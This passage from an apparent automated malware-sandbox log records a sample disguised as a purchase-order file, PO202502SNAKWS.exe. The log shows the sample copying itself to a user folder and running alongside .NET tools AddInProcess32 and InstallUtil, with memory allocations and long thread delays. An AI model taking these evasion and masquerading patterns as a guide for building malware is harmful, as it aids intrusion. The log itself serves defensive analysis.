Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory allocated: 276339D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Memory allocated: 2B6CBB60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 2F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory allocated: 1B37AE90000 memory reserve \| memory write watch
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory allocated: 1B37AEB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1480000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 3240000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory allocated: 1A00000 memory reserve \| memory write watch
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory allocated: 15F25EC0000 memory reserve \| memory write watch
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Memory allocated: 15F25EE0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2910000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2A70000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2910000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598967	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597842	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597143	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594386	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599225
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598578
